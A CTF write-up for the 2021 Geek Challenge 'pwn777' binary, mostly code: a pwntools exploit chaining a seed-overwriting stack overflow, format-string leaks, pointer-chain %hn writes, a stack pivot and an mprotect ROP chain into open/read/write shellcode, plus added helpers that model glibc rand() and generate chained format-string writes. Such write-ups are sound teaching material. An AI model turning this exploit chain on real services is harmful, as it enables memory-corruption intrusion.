2021 极客大挑战 (Geek Challenge) - pwn777 (WriteUp)

A freshman contest run by Chengdu University of Information Technology. Somewhat disappointing: the pwn challenges were trivially easy, and only pwn777 was of any interest.

Attachment: https://pan.baidu.com/s/1mEDAOE3Pz-x0oH4-eTcR-Q (extraction code: 3pte)

Overall approach:
Use the stack overflow to overwrite the random seed, then pass the guessing game with the now-predictable rand() sequence. Next, use the format string bug to leak addresses.
A sandbox is enabled that blocks execve, so one_gadget and system are out; instead, call mprotect to make a page executable and run ORW (open/read/write) shellcode that reads the flag directly.
The format string buffer lives in .bss rather than on the stack, so there is no attacker-controlled data on the stack to serve as write targets. Instead, find a chain of stack words that point at other stack words, use the first word of each pair to steer the second at the address to be modified, and overwrite the saved rbp and the return address that way. That pivots the stack into .bss, where the ROP chain and shellcode are placed. The exploit only patches the low 16 bits of existing stack pointers, which is enough because every slot it needs lies within the same 64 KiB window of the stack, so only the low 16 bits of the leaked stack address matter.
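To regenerate the rand() sequence for any seed without linking against the target's libc, here is glibc's default TYPE_3 additive-feedback generator in pure Python. This is an added example, not code from the original writeup; it assumes the target uses glibc's rand() (which shares random()'s state) and a seed in the range 0 <= seed < 2**31, which covers the seed of 0 the writeup plants.

```python
# Added example, not from the original writeup: glibc's rand() (the TYPE_3
# additive-feedback generator behind rand()/random()) in pure Python, so the
# predicted-number table can be regenerated for any seed offline.
# Assumes 0 <= seed < 2**31 (a non-negative int passed to srand()).

def glibc_rand_sequence(seed, count):
    """Return the first `count` values rand() yields after srand(seed)."""
    if not 0 <= seed < 2**31:
        raise ValueError("this model only covers non-negative 31-bit seeds")
    if seed == 0:
        seed = 1                      # glibc replaces a zero seed with 1
    r = [0] * (344 + count)
    r[0] = seed
    for i in range(1, 31):
        # Park-Miller LCG fills the 31 words of initial state
        r[i] = (16807 * r[i - 1]) % 2147483647
    for i in range(31, 34):
        r[i] = r[i - 31]
    for i in range(34, 344 + count):
        # additive feedback: r[i] = r[i-31] + r[i-3] (mod 2**32); srand itself
        # discards the first 310 of these before rand() returns anything
        r[i] = (r[i - 31] + r[i - 3]) & 0xFFFFFFFF
    # rand() returns each new word shifted right by one (a 31-bit value)
    return [r[i] >> 1 for i in range(344, 344 + count)]


if __name__ == "__main__":
    # seed 0 is what the stack overflow writes; glibc treats it as seed 1
    for v in glibc_rand_sequence(0, 10):
        print(v)
```

Running it with seed 0 reproduces the ten values hard-coded in the exploit below, and because a zero seed is mapped to 1 the same sequence comes out for seed 1.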

Reference exploit:

from pwn import *

context(os = "linux", arch = "amd64", log_level = "debug")
io = remote("47.242.20.238", 7777)

# First ten outputs of glibc rand() after srand(0) (glibc treats seed 0 as seed 1)
nums = [1804289383, 846930886, 1681692777, 1714636915, 1957747793, 424238335, 719885386, 1649760492, 596516649, 1189641421]
libc = ELF("./libc-2.23.so")
elf = ELF('./pwn')

# Stack overflow in the name buffer: 24 bytes of filler reach the seed variable, which is set to 0
io.recvuntil(b"name\n")
payload = b'a'*24 + p32(0)
io.send(payload)

# Answer the ten guessing rounds with the predicted sequence
for i in range(10):
    io.recvuntil(b"number:")
    io.sendline(str(nums[i]).encode())

# Format string leak: %13$p is __libc_start_main+240 (main's return address on glibc 2.23),
# %6$p is a stack pointer, %11$p is an address inside the PIE binary
io.recvuntil(b"best!\n")
io.sendline(b'%13$p%6$p%11$p')
libc_addr = int(io.recv(14)[2:14], 16)
base1 = libc_addr - 240 - libc.sym["__libc_start_main"]
log.info('LIBC:\t' + hex(base1))
mprotect_addr = base1 + libc.sym["mprotect"]
log.info('mprotect_addr:\t' + hex(mprotect_addr))
addr = int(io.recv(14)[10:14], 16)    # only the low 16 bits of the stack address are needed
main_addr = int(io.recv(14)[2:14], 16)
base2 = main_addr - 0x16a8
log.info('PIE:\t' + hex(base2))
log.info('BSS:\t' + hex(elf.bss()))
bss_addr = base2 + 0x4060 + 16 - 8    # 8 bytes into the bss input buffer: the word the pivot pops into rbp
leave_addr = base2 + 0x1676           # leave; ret gadget in the binary
log.info('bss_addr:\t' + hex(bss_addr))
log.info('leave_addr:\t' + hex(leave_addr))

# Every write is a two-step chain through existing stack pointers: the word printf reads as slot 6 holds a
# pointer to the word read as slot 10, and slot 15 holds a pointer to the word read as slot 41. A %hn through
# the first slot patches the low 16 bits of the pointer in the second, retargeting it; a %hn/%hhn through the
# second slot then writes at the retargeted address. A chunk of 0 would need %65536c (or %256c for %hhn),
# because %0c still prints one character; none of the chunks here are 0.

# Step 1: point slot 10 at the saved return address (addr + 8) and patch its low byte to the leave; ret gadget
val = addr + 8
payload = f"%{val}c%6$hn".encode()
io.sendline(payload)
payload = f"%{leave_addr & 0xFF}c%10$hhn".encode()
io.sendline(payload)

# Step 2: point slot 41 at the saved rbp (addr) and write bss_addr into it, two bytes at a time
# (bytes 6 and 7 of the saved rbp are already 0, so three 16-bit writes are enough)
for off in range(0, 6, 2):
    val = addr + off
    payload = f"%{val}c%15$hn".encode()
    io.sendline(payload)
    payload = f"%{(bss_addr >> (8 * off)) & 0xFFFF}c%41$hn".encode()
    io.sendline(payload)

# ORW shellcode: open("./flag", O_RDONLY); read(fd, buf, 0x100); write(1, buf, 0x100). No execve needed.
# Comments are in /* */ form because pwntools' asm() runs the source through cpp first.
shellcode='''
    xor rax, rax
    xor rdi, rdi
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 2                  /* SYS_open, rsi = O_RDONLY, rdx = 0 */
    mov rdi, 0x67616c662f2e     /* "./flag" little-endian; push zero-extends it, so the string is NUL-terminated */
    push rdi
    mov rdi, rsp
    syscall                     /* rax = fd */

    mov rdx, 0x100              /* read up to 0x100 bytes over the filename buffer on the stack */
    mov rsi, rdi
    mov rdi, rax
    mov rax, 0                  /* SYS_read */
    syscall

    mov rdi, 1                  /* write(stdout, buf, 0x100); rsi and rdx are still set */
    mov rax, 1                  /* SYS_write */
    syscall
'''

# After leave; ret, rsp = bss_addr: the word there is popped into rbp and the chain that follows is executed.
# mprotect(page containing bss, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC), then return into the shellcode.
pop_rdi_ret = base1 + 0x21112
pop_rsi_ret = base1 + 0x202f8
pop_rdx_ret = base1 + 0x1b92
payload = b'jiaraniloveyou~\x00'                  # 16 bytes: the NUL stops printf, the second word becomes rbp
payload += p64(pop_rdi_ret)
payload += p64(bss_addr & 0xFFFFFFFFFFFFF000)     # page-aligned start of the bss page
payload += p64(pop_rsi_ret)
payload += p64(0x1000)
payload += p64(pop_rdx_ret)
payload += p64(7)                                 # PROT_READ | PROT_WRITE | PROT_EXEC
payload += p64(mprotect_addr)
payload += p64(bss_addr + len(payload))           # bss_addr is buffer+8 and this word sits at offset 72,
                                                  # so this is exactly where the shellcode below lands
payload += asm(shellcode)

io.sendline(payload)
io.interactive()
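The pointer-chain writes above (slot 15 retargets slot 41, then slot 41 writes the saved rbp two bytes at a time) are generated by hand in the exploit. The following generalizes them into a small generator and checks the result against a minimal model of printf, so the chain can be verified offline before touching the remote service. This is an added example, not code from the original writeup: the slot numbers, stack addresses and bss value in demo() are constructed, the %hn semantics are modelled in Python rather than produced by a real printf, and it additionally covers the case the hand-written exploit does not, a 16-bit chunk of zero, for which %0c would still print one character.

```python
import re

# Added example, not from the original writeup: generate the chained %hn
# writes and check them against a small model of printf. Slot numbers,
# addresses and the bss value in demo() are constructed for the demo.

def hn_count(chunk, width):
    """Characters that %Nc has to print so the running count, reduced mod
    2**(8*width), equals `chunk`. %0c still emits one character, so a zero
    chunk needs a full wrap (0x10000 for %hn, 0x100 for %hhn)."""
    mask = (1 << (8 * width)) - 1
    chunk &= mask
    return chunk if chunk else mask + 1


def chained_writes(ptr_slot, data_slot, target_low16, value, nbytes):
    """Two format strings per 16-bit chunk of `value`: the first rewrites the
    low 16 bits of the pointer held in data_slot's stack word (reached through
    ptr_slot, which must already point at that word); the second writes the
    chunk through data_slot. Like the writeup, this assumes that pointer and
    the target lie in the same 64 KiB window, so only the leaked low 16 bits
    of a stack address are needed."""
    payloads = []
    for off in range(0, nbytes, 2):
        chunk = (value >> (8 * off)) & 0xFFFF
        payloads.append(f"%{hn_count(target_low16 + off, 2)}c%{ptr_slot}$hn".encode())
        payloads.append(f"%{hn_count(chunk, 2)}c%{data_slot}$hn".encode())
    return payloads


def apply_format_writes(mem, base, payloads):
    """Minimal model of printf on "%<n>c%<k>$hn": `mem` is a little-endian
    image of the stack starting at address `base`; on amd64 argument slot k
    (k >= 6) is the 8-byte word at rsp + 8*(k-6), i.e. base + 8*(k-6), and
    %hn stores the low 16 bits of the character count at the address held
    in that slot. %0c is modelled as printing one character."""
    for p in payloads:
        m = re.fullmatch(rb"%(\d+)c%(\d+)\$hn", p)
        if not m:
            raise ValueError(f"unsupported payload {p!r}")
        count, slot = int(m.group(1)), int(m.group(2))
        word = 8 * (slot - 6)
        ptr = int.from_bytes(mem[word:word + 8], "little")
        dst = ptr - base
        mem[dst:dst + 2] = (max(count, 1) & 0xFFFF).to_bytes(2, "little")
    return mem


def demo():
    """Replay the writeup's saved-rbp overwrite (slot 15 -> slot 41 -> rbp)
    on a constructed stack image; returns the final rbp word and the payloads."""
    base = 0x7FFC12340000                       # constructed: the address printf sees as slot 6
    mem = bytearray(0x200)

    def put(slot, val):
        word = 8 * (slot - 6)
        mem[word:word + 8] = val.to_bytes(8, "little")

    ptr_slot, data_slot, rbp_slot = 15, 41, 46
    put(ptr_slot, base + 8 * (data_slot - 6))   # slot 15 holds the address of slot 41's word
    put(data_slot, base + 0x100)                # slot 41 holds some nearby stack pointer
    put(rbp_slot, base + 0x1F0)                 # the saved rbp we want to replace
    target = base + 8 * (rbp_slot - 6)
    bss_addr = 0x55D000004068                   # constructed; its middle 16-bit chunk is zero on purpose
    payloads = chained_writes(ptr_slot, data_slot, target & 0xFFFF, bss_addr, 6)
    apply_format_writes(mem, base, payloads)
    word = target - base
    return int.from_bytes(mem[word:word + 8], "little"), payloads


if __name__ == "__main__":
    rbp, payloads = demo()
    for p in payloads:
        print(p.decode())
    print(hex(rbp))
```

The zero chunk shows up as %65536c%41$hn: the service really does have to emit 64 KiB for that one write, which is slow over a network but harmless. When adapting this to another binary, the only inputs that change are the two slot numbers (found by dumping the stack with %p and looking for a word that points at another word) and the low 16 bits of the leaked stack address.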
posted @ 2021-11-15 00:21  winmt